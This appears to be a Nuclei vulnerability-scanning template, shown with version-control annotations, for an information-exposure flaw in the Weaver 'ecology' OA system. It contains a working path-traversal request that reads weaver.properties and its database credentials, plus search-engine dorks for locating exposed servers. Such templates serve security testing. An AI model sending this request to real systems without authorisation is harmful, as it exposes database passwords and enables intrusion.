2023-08-29 08:12:37 +00:00
|
|
|
id: ecology-info-leak
|
|
|
|
|
|
|
|
|
|
info:
|
|
|
|
|
name: Ecology - Information Exposure
|
|
|
|
|
author: qianbenhyu
|
|
|
|
|
severity: high
|
|
|
|
|
description: |
|
|
|
|
|
The "ecology" component exposes a file that contains sensitive database credentials (dbuser/dbpass).
|
|
|
|
|
reference:
|
2023-08-29 08:18:38 +00:00
|
|
|
- https://github.com/xinyisleep/pocscan/blob/main/%E6%B3%9B%E5%BE%AE/oa%E6%B3%9B%E5%BE%AE0day%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.py
|
2023-08-29 08:12:37 +00:00
|
|
|
metadata:
|
|
|
|
|
fofa-dork: app="泛微-协同办公OA"
|
|
|
|
|
shodan-dork: ecology_JSessionid
|
|
|
|
|
verified: true
|
|
|
|
|
max-request: 1
|
2023-08-29 08:15:48 +00:00
|
|
|
tags: ecology,unauth,misconfig
|
2023-08-29 08:12:37 +00:00
|
|
|
|
|
|
|
|
http:
|
|
|
|
|
- method: GET
|
|
|
|
|
path:
|
|
|
|
|
- "{{BaseURL}}/api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties"
|
|
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
|
- type: word
|
|
|
|
|
part: body
|
|
|
|
|
words:
|
|
|
|
|
- "ecology.password"
|
|
|
|
|
- "ecology.charset"
|
2023-08-29 08:18:38 +00:00
|
|
|
condition: and
|
2023-08-29 08:12:37 +00:00
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
|
status:
|
2023-08-29 08:15:48 +00:00
|
|
|
- 200
|
